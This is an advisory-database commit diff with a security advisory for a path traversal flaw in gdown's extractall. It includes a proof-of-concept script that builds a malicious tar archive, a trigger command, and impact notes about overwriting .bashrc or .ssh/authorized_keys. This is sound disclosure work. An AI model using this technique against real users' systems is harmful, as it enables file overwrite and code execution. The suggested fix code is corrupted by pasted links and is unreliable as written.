+ "details": "### Summary\nThe gdown library (tested on v5.2.1) is vulnerable to a Path Traversal attack within its extractall functionality. When extracting a maliciously crafted ZIP or TAR archive, the library fails to sanitize or validate the filenames of the archive members. This allow files to be written outside the intended destination directory, potentially leading to arbitrary file overwrite and Remote Code Execution (RCE).\n\n### Details\nThe vulnerability exists in `gdown/extractall.py` within the `extractall()` function. The function takes an archive path and a destination directory (`to`), then calls the underlying `extractall()` method of Python's `tarfile` or `zipfile` modules without validating whether the archive members stay within the `to` boundary.\n\nVulnerable Code:\n```\n# gdown/extractall.py\ndef extractall(path, to=None):\n # ... (omitted) ...\n with opener(path, mode) as f:\n f.extractall(path=to) # Vulnerable: No path validation or filters`\n```\nEven on modern Python versions (3.12+), if the `filter` parameter is not explicitly set or if the library's wrapper logic bypasses modern protections, path traversal remains possible as demonstrated in the PoC.\n\n\n### PoC\n## Steps to Reproduce\n\n1. Create the Malicious Archive (`poc.py`):\n```\nimport tarfile\nimport io\nimport os\n\n# Create a target directory\nos.makedirs(\"./safe_target/subfolder\", exist_ok=True)\n\n# Generate a TAR file containing a member with path traversal\nwith tarfile.open(\"evil.tar\", \"w\") as tar:\n # Target: escape the subfolder and write to the parent 'safe_target'\n payload = tarfile.TarInfo(name=\"../escape.txt\")\n content = b\"Path Traversal Success!\"\n payload.size = len(content)\n tar.addfile(payload, io.BytesIO(content))\n\nprint(\"[+] evil.tar created.\")`\n```\n1. Execute the Vulnerable Function:\n```\n`python3 -c \"from gdown import extractall; extractall('evil.tar', to='./safe_target/subfolder')\"`\n```\n1. Verify the Escape:\n```\nls -l ./safe_target/escape.txt\n# Output: -rw-r--r-- 1 user user 23 Mar 15 2026 ./safe_target/escape.txt`\n```\n\n### Impact\nAn attacker can provide a specially crafted archive that, when extracted via `gdown`, overwrites critical files on the victim's system.\n\n- Arbitrary File Overwrite: Overwriting `.bashrc`, `.ssh/authorized_keys`, or configuration files.\n- Remote Code Execution (RCE): By overwriting executable scripts or Python modules within a virtual environment.\n\n\n### Recommended Mitigation \nmplement path validation to ensure that all extracted files are contained within the target directory.\n\n**Suggested Fix:**\n\n```\nimport os\n\ndef is_within_directory(directory, target):\n abs_directory = os.path.abspath(directory)\n abs_target = os.path.abspath(target)\n prefix = os.path.commonpath([abs_directory])\n return os.path.commonpath([abs_directory, abs_target]) == prefix\n\n# Inside [extractall.py](http://extractall.py/)\nwith opener(path, mode) as f:\n if isinstance(f, tarfile.TarFile):\n for member in f.getmembers():\n member_path = os.path.join(to, [member.name](http://member.name/))\n if not is_within_directory(to, member_path):\n raise Exception(\"Attempted Path Traversal in Tar File\")\n f.extractall(path=to)\n```",
![advisory-database[bot]](https://avatars.githubusercontent.com/in/21409?v=4&size=40){kind=avatar}
0 commit comments